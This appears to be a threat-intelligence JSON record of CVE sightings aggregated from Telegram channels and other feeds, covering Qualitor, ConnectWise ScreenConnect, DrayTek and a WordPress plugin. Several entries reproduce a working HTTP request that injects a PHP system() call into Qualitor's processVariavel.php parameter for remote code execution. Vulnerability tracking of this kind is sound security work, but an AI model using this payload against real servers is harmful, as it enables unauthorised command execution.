{"vulnerability": "cve-2023-4725", "sightings": [{"uuid": "01488377-8e64-49f4-9eaa-ca45b86feccf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-47250", "type": "seen", "source": "MISP/0bd7388a-e1df-4806-aa82-02ce3b1ac553", "content": "", "creation_timestamp": "2023-12-31T18:18:46.000000Z"}, {"uuid": "45255705-84c7-4fe2-b37d-9a14fa21d144", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-47251", "type": "seen", "source": "MISP/00941aeb-379c-4544-8c08-43e64b6120d7", "content": "", "creation_timestamp": "2023-12-31T18:18:48.000000Z"}, {"uuid": "c82e223d-a103-4433-a92a-0f67eb62e9e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-47256", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18612", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-47256\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: ConnectWise ScreenConnect through 23.8.4 allows local users to connect to arbitrary relay servers via implicit trust of proxy settings\n\ud83d\udccf Published: 2024-02-01T00:00:00.000Z\n\ud83d\udccf Modified: 2025-06-17T16:16:50.199Z\n\ud83d\udd17 References:\n1. https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.8-security-fix\n2. https://web.archive.org/web/20240208140218/https://gotham-security.com/screenconnect-cve-2023-47256", "creation_timestamp": "2025-06-17T16:41:03.000000Z"}, {"uuid": "d6f610c8-4900-4e30-ab0d-490cc92609ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-47253", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8556", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aCVE-2023-47253 | Qualitor <= 8.20 RCE\nURL\uff1ahttps://github.com/OpenXP-Research/CVE-2023-47253\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-09-19T14:12:10.000000Z"}, {"uuid": "c4659141-da56-47dc-91a8-f57c445458d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-47253", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8555", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aCVE-2023-47253 | Qualitor <= 8.20 RCE\nURL\uff1ahttps://github.com/vnxdtzip/CVE-2023-47253\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-09-19T14:01:44.000000Z"}, {"uuid": "49ee7ae0-5537-4d88-884b-4cf5d2000633", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-47253", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18212", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-47253\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: Qualitor through 8.20 allows remote attackers to execute arbitrary code via PHP code in the html/ad/adpesquisasql/request/processVariavel.php gridValoresPopHidden parameter.\n\ud83d\udccf Published: 2023-11-06T00:00:00.000Z\n\ud83d\udccf Modified: 2025-06-12T16:38:22.382Z\n\ud83d\udd17 References:\n1. https://www.linkedin.com/in/xvinicius/\n2. https://www.linkedin.com/in/hairrison-wenning-4631a4124/\n3. https://www.qualitor.com.br/qualitor-8-20\n4. https://openxp.xpsec.co/blog/cve-2023-47253\n5. https://www.qualitor.com.br/official-security-advisory-cve-2023-47253", "creation_timestamp": "2025-06-12T17:35:15.000000Z"}, {"uuid": "c3b71a6b-4d7b-4a2b-8405-ddbe5500775b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-47253", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3mhyiuuzklw22", "content": "", "creation_timestamp": "2026-03-26T21:03:02.819848Z"}, {"uuid": "4d97b8d8-6852-4528-b6ef-91358f7335c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-47253", "type": "published-proof-of-concept", "source": "https://t.me/ton618cyber/1097", "content": "#exploit\n1. CVE-2023-47253:\nQualitor <=8.2 - RCE\nhttps://github.com/vnxdtzip/CVE-2023-47253\n\n2. CVE-2024-7339:\nInformation Leak in DVR devices\nhttps://github.com/RevoltSecurities/CVE-2024-7339\n\n3. CVE-2024-5830:\nFrom object transition to RCE in the Chrome renderer\nhttps://github.blog/security/vulnerability-research/from-object-transition-to-rce-in-the-chrome-renderer", "creation_timestamp": "2024-09-22T04:47:11.000000Z"}, {"uuid": "f6288273-4aa6-4db2-91a0-891ce5697528", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-47253", "type": "published-proof-of-concept", "source": "Telegram/dabuzJkls92bdJnfNjwitJoYPoFV8U_J4cqC1hwGrGW2kg", "content": "", "creation_timestamp": "2024-09-26T11:28:26.000000Z"}, {"uuid": "e8244afb-3c54-49d6-af90-2206d5b2bd8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-47253", "type": "published-proof-of-concept", "source": "https://t.me/ton618cyber/4116", "content": "#exploit\n1. CVE-2023-47253:\nQualitor <=8.2 - RCE\nhttps://github.com/vnxdtzip/CVE-2023-47253\n\n2. CVE-2024-7339:\nInformation Leak in DVR devices\nhttps://github.com/RevoltSecurities/CVE-2024-7339\n\n3. CVE-2024-5830:\nFrom object transition to RCE in the Chrome renderer\nhttps://github.blog/security/vulnerability-research/from-object-transition-to-rce-in-the-chrome-renderer", "creation_timestamp": "2024-09-22T04:47:11.000000Z"}, {"uuid": "a2a21ea5-d572-4dd2-a222-5f2f7c24e967", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-47253", "type": "published-proof-of-concept", "source": "Telegram/otaVWtF_nu3f6o-skFv4SWvLt2xwDV3NOvHE0hYwoHmxK5Ux", "content": "", "creation_timestamp": "2024-09-26T10:48:28.000000Z"}, {"uuid": "bcafcd37-beaf-42f6-a20a-8a801988756e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-4725", "type": "seen", "source": "https://t.me/cibsecurity/72353", "content": "\u203c CVE-2023-4725 \u203c\n\nThe Simple Posts Ticker WordPress plugin before 1.1.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-10-17T00:32:21.000000Z"}, {"uuid": "251d1a16-8026-4587-b2f1-b43354e1b752", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-47257", "type": "seen", "source": "https://t.me/ctinow/192643", "content": "https://ift.tt/wi9PC3f\nCVE-2023-47257 | ConnectWise ScreenConnect up to 23.8.4 channel accessible", "creation_timestamp": "2024-02-24T16:11:34.000000Z"}, {"uuid": "45e7d697-7efd-402f-86d0-874b4b45b929", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-47256", "type": "seen", "source": "https://t.me/ctinow/192626", "content": "https://ift.tt/ASfVQHj\nCVE-2023-47256 | ConnectWise ScreenConnect up to 23.8.4 Proxy Setting access control", "creation_timestamp": "2024-02-24T15:16:55.000000Z"}, {"uuid": "cdda93a8-d0f7-4095-8d5a-e8decfe49aa3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-47253", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3229", "content": "CVE-2023-47253\n\nGET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system(\"dir\"); HTTP/1.1\nHost: 127.0.0.1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Encoding: gzip, deflate\nConnection: keep-alive\n\ndir\n\n#exploit #poc", "creation_timestamp": "2024-09-30T06:33:30.000000Z"}, {"uuid": "5753b08e-5978-425b-98b1-2a926567aa48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-47253", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3198", "content": "https://github.com/vnxdtzip/CVE-2023-47253\n\nCVE-2023-47253 | Qualitor <= 8.20 RCE\n#github #poc", "creation_timestamp": "2024-09-20T17:01:50.000000Z"}, {"uuid": "68158a20-acec-42a2-baee-2cab8db1ccf4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-47253", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/18932", "content": "CVE-2023-47253\n\nGET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system(\"dir\"); HTTP/1.1\nHost: 127.0.0.1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Encoding: gzip, deflate\nConnection: keep-alive\n\ndir\n\n#exploit #poc", "creation_timestamp": "2024-09-26T11:12:42.000000Z"}, {"uuid": "b9b51e91-23d8-4187-b2a6-42680e07442f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-47253", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/2079", "content": "CVE-2023-47253\n\nGET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system(\"dir\"); HTTP/1.1\nHost: 127.0.0.1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Encoding: gzip, deflate\nConnection: keep-alive\n\ndir\n\n#exploit #poc", "creation_timestamp": "2024-09-26T11:12:42.000000Z"}, {"uuid": "57c6a6fa-995c-4a1e-b154-af942a078532", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-47257", "type": "seen", "source": "https://t.me/ctinow/177821", "content": "https://ift.tt/HBe3io2\nCVE-2023-47257", "creation_timestamp": "2024-02-01T23:26:33.000000Z"}, {"uuid": "b6e3e007-0410-41b9-bad8-b63b81748c2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-47256", "type": "seen", "source": "https://t.me/ctinow/177820", "content": "https://ift.tt/PgQm1yE\nCVE-2023-47256", "creation_timestamp": "2024-02-01T23:26:32.000000Z"}, {"uuid": "bfe708fe-4446-43a0-af7d-1d300b2eff70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-47254", "type": "seen", "source": "https://t.me/ctinow/161238", "content": "https://ift.tt/8SQiKzU\nCVE-2023-47254 | DrayTek Vigor167 5.2.2 CLI os command injection (SYSS-2023-023)", "creation_timestamp": "2024-01-01T08:57:02.000000Z"}, {"uuid": "36502adc-f5fa-4d81-9d35-757302c40bba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-47253", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/11169", "content": "#exploit\n1. CVE-2023-47253:\nQualitor <=8.2 - RCE\nhttps://github.com/vnxdtzip/CVE-2023-47253\n\n2. CVE-2024-7339:\nInformation Leak in DVR devices\nhttps://github.com/RevoltSecurities/CVE-2024-7339\n\n3. CVE-2024-5830:\nFrom object transition to RCE in the Chrome renderer\nhttps://github.blog/security/vulnerability-research/from-object-transition-to-rce-in-the-chrome-renderer", "creation_timestamp": "2024-09-22T02:44:19.000000Z"}, {"uuid": "7477c823-7ee4-4714-b572-15f49a68aad0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-47253", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/4491", "content": "#exploit\n1. CVE-2023-47253:\nQualitor <=8.2 - RCE\nhttps://github.com/vnxdtzip/CVE-2023-47253\n\n2. CVE-2024-7339:\nInformation Leak in DVR devices\nhttps://github.com/RevoltSecurities/CVE-2024-7339\n\n3. CVE-2024-5830:\nFrom object transition to RCE in the Chrome renderer\nhttps://github.blog/security/vulnerability-research/from-object-transition-to-rce-in-the-chrome-renderer", "creation_timestamp": "2024-09-22T12:58:13.000000Z"}]}